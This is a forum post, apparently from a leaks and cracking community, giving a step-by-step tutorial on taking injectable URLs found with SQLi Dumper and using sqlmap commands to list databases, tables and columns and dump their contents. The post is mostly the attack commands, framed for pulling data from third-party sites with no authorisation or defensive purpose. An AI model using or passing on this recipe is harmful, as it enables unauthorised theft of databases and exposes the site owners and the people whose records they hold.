• Register now to get access to thousands of Tutorials, Leaked content, Hot NSFW and much more. Join us as we build and grow the community.

Advertise Here

Advertise Here

Advertise Here

[Tutorial] How to dump databases 10x faster than SQLi Dumper

m42b

Quest Seeker
M Rep
0
0
0
Rep
0
M Vouches
0
0
0
Vouches
0
Posts
124
Likes
84
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 2 800 XP
This guide will briefly explain how to use SQLMap to dump databases at a much quicker pace than SQLi Dumper.
Step 1: After going through the whole SQLi Dumper process, find your injectable URL and hold on to it, these are usually found in the "Injectables" tab.
Step 2:Installsqlmap on your preferred operating system, (this requires python).
Step 3: Once installed launch sqlmap from here on out we will refer to this as just "sqlmap" (If installed with apt "sqlmap", if being launched via directory "sqlmap.py" or "python sqlmap.py")
Step 4: Once you have sqlmap open enter the following into the terminal [sqlmap -u "URL"] include the quotations around the URL. Answer the questions to your preference.
Step 5: Scanning is done! Time to dump!
(List databases): sqlmap -u "URL" --dbs
(List tables): sqlmap -u "URL" -D "DATABASE" --tables
(List columns): sqlmap -u "URL" -D "DATABASE" -T "TABLE" --columns
(Initialize dump): sqlmap -u "URL" -D "DATABASE" -T "TABLE" -C "column1, column2, column3" --dump --eta
Once it's done dumping it will notify you of the saved location for the database [rectof#5833]
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

452,501

351,446

351,460

Top